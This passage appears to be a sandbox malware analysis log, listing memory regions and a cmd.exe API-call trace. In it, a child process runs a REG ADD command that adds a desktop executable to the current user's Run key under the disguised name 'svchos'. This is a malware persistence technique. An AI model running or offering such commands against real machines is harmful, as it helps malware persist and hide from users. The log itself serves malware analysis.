(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14200 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14201 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14202 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 14203 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14204 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14205 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 14206 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14207 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14208 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14209 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 14210 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14211 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14212 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14213 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 973 os_tid = 0x10cc Process: id = "411" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x144f000" os_pid = "0xf58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14214 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14215 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14216 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14217 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14218 start_va = 0x4a560000 end_va = 0x4a5b8fff entry_point = 0x4a560000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14219 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14220 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14221 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14222 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14223 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14224 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 14225 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 14309 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14310 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 14311 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14312 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14313 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14314 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14315 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14607 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14608 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14609 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 14610 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 14611 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 14612 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 14613 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 14614 start_va = 0x510000 end_va = 0x697fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 14615 start_va = 0x6a0000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 14616 start_va = 0x830000 end_va = 0x1c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 14617 start_va = 0x1c30000 end_va = 0x1f72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 14618 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14619 start_va = 0x7fef8f40000 end_va = 0x7fef8f47fff entry_point = 0x7fef8f40000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14620 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14621 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14622 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14623 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14624 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14625 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14638 start_va = 0x1f80000 end_va = 0x224efff entry_point = 0x1f80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 974 os_tid = 0x12cc [0125.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f990 | out: lpSystemTimeAsFileTime=0x18f990*(dwLowDateTime=0xffb7f350, dwHighDateTime=0x1d48689)) [0125.530] GetCurrentProcessId () returned 0xf58 [0125.530] GetCurrentThreadId () returned 0x12cc [0125.530] GetTickCount () returned 0x28e79 [0125.530] QueryPerformanceCounter (in: lpPerformanceCount=0x18f998 | out: lpPerformanceCount=0x18f998*=1817244800000) returned 1 [0125.531] GetModuleHandleW (lpModuleName=0x0) returned 0x4a560000 [0125.531] __set_app_type (_Type=0x1) [0125.532] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a587810) returned 0x0 [0125.532] __getmainargs (in: _Argc=0x4a5aa608, _Argv=0x4a5aa618, _Env=0x4a5aa610, _DoWildCard=0, _StartInfo=0x4a58e0f4 | out: _Argc=0x4a5aa608, _Argv=0x4a5aa618, _Env=0x4a5aa610) returned 0 [0125.532] GetCurrentThreadId () returned 0x12cc [0125.532] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12cc) returned 0x3c [0125.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77550000 [0125.539] GetProcAddress (hModule=0x77550000, lpProcName="SetThreadUILanguage") returned 0x77566d40 [0125.539] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.539] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.540] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f928 | out: phkResult=0x18f928*=0x0) returned 0x2 [0125.540] VirtualQuery (in: lpAddress=0x18f910, lpBuffer=0x18f890, dwLength=0x30 | out: lpBuffer=0x18f890*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.540] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f890, dwLength=0x30 | out: lpBuffer=0x18f890*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.540] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f890, dwLength=0x30 | out: lpBuffer=0x18f890*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.540] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f890, dwLength=0x30 | out: lpBuffer=0x18f890*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.540] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f890, dwLength=0x30 | out: lpBuffer=0x18f890*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0125.540] GetConsoleOutputCP () returned 0x1b5 [0125.540] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a59bfe0 | out: lpCPInfo=0x4a59bfe0) returned 1 [0125.540] SetConsoleCtrlHandler (HandlerRoutine=0x4a583184, Add=1) returned 1 [0125.540] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.540] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0125.546] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.546] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a58e194 | out: lpMode=0x4a58e194) returned 1 [0125.547] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.547] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0125.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0125.549] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a58e198 | out: lpMode=0x4a58e198) returned 1 [0125.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0125.549] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0125.551] GetEnvironmentStringsW () returned 0x208c20* [0125.551] FreeEnvironmentStringsW (penv=0x208c20) returned 1 [0125.551] GetEnvironmentStringsW () returned 0x208c20* [0125.551] FreeEnvironmentStringsW (penv=0x208c20) returned 1 [0125.551] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7e8 | out: phkResult=0x18e7e8*=0x44) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x0, lpData=0x18e800*=0x18, lpcbData=0x18e7e4*=0x1000) returned 0x2 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x1, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x0, lpData=0x18e800*=0x1, lpcbData=0x18e7e4*=0x1000) returned 0x2 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x0, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x40, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x40, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x0, lpData=0x18e800*=0x40, lpcbData=0x18e7e4*=0x1000) returned 0x2 [0125.552] RegCloseKey (hKey=0x44) returned 0x0 [0125.552] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e7e8 | out: phkResult=0x18e7e8*=0x44) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x0, lpData=0x18e800*=0x40, lpcbData=0x18e7e4*=0x1000) returned 0x2 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x1, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x0, lpData=0x18e800*=0x1, lpcbData=0x18e7e4*=0x1000) returned 0x2 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x0, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x9, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x4, lpData=0x18e800*=0x9, lpcbData=0x18e7e4*=0x4) returned 0x0 [0125.552] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e7e0, lpData=0x18e800, lpcbData=0x18e7e4*=0x1000 | out: lpType=0x18e7e0*=0x0, lpData=0x18e800*=0x9, lpcbData=0x18e7e4*=0x1000) returned 0x2 [0125.552] RegCloseKey (hKey=0x44) returned 0x0 [0125.552] time (in: timer=0x0 | out: timer=0x0) returned 0x5bfd9f43 [0125.552] srand (_Seed=0x5bfd9f43) [0125.553] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f" [0125.553] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f" [0125.553] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a59c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0125.553] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20abe0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0125.553] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0125.553] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.553] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.553] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0125.553] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0125.553] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0125.553] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0125.553] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0125.553] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0125.553] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0125.553] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0125.553] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0125.554] GetEnvironmentStringsW () returned 0x208c20* [0125.554] FreeEnvironmentStringsW (penv=0x208c20) returned 1 [0125.554] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.554] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0125.554] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0125.554] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0125.554] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0125.554] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0125.554] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0125.554] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0125.554] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0125.554] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0125.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f5f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0125.554] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f5f0, lpFilePart=0x18f5d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f5d0*="Desktop") returned 0x25 [0125.554] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0125.555] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f300 | out: lpFindFileData=0x18f300) returned 0x1f1390 [0125.555] FindClose (in: hFindFile=0x1f1390 | out: hFindFile=0x1f1390) returned 1 [0125.555] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f300 | out: lpFindFileData=0x18f300) returned 0x1f1390 [0125.555] FindClose (in: hFindFile=0x1f1390 | out: hFindFile=0x1f1390) returned 1 [0125.555] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0125.555] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f300 | out: lpFindFileData=0x18f300) returned 0x1f1390 [0125.555] FindClose (in: hFindFile=0x1f1390 | out: hFindFile=0x1f1390) returned 1 [0125.555] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0125.555] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0125.555] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0125.556] GetEnvironmentStringsW () returned 0x208c20* [0125.556] FreeEnvironmentStringsW (penv=0x208c20) returned 1 [0125.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a59c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0125.556] GetConsoleOutputCP () returned 0x1b5 [0125.582] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a59bfe0 | out: lpCPInfo=0x4a59bfe0) returned 1 [0125.582] GetUserDefaultLCID () returned 0x409 [0125.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a597b50, cchData=8 | out: lpLCData=":") returned 2 [0125.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f700, cchData=128 | out: lpLCData="0") returned 2 [0125.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f700, cchData=128 | out: lpLCData="0") returned 2 [0125.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f700, cchData=128 | out: lpLCData="1") returned 2 [0125.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5aa740, cchData=8 | out: lpLCData="/") returned 2 [0125.582] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5aa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5aa460, cchData=32 | out: lpLCData="Tue") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5aa420, cchData=32 | out: lpLCData="Wed") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5aa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5aa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5aa360, cchData=32 | out: lpLCData="Sat") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5aa700, cchData=32 | out: lpLCData="Sun") returned 4 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a597b40, cchData=8 | out: lpLCData=".") returned 2 [0125.583] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5aa4e0, cchData=8 | out: lpLCData=",") returned 2 [0125.583] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0125.583] GetConsoleTitleW (in: lpConsoleTitle=0x20baa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0125.583] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77550000 [0125.584] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileExW") returned 0x775623d0 [0125.584] GetProcAddress (hModule=0x77550000, lpProcName="IsDebuggerPresent") returned 0x77558290 [0125.584] GetProcAddress (hModule=0x77550000, lpProcName="SetConsoleInputExeNameW") returned 0x775617e0 [0125.584] _wcsicmp (_String1="REG", _String2=")") returned 73 [0125.584] _wcsicmp (_String1="FOR", _String2="REG") returned -12 [0125.584] _wcsicmp (_String1="FOR/?", _String2="REG") returned -12 [0125.584] _wcsicmp (_String1="IF", _String2="REG") returned -9 [0125.584] _wcsicmp (_String1="IF/?", _String2="REG") returned -9 [0125.584] _wcsicmp (_String1="REM", _String2="REG") returned 6 [0125.584] 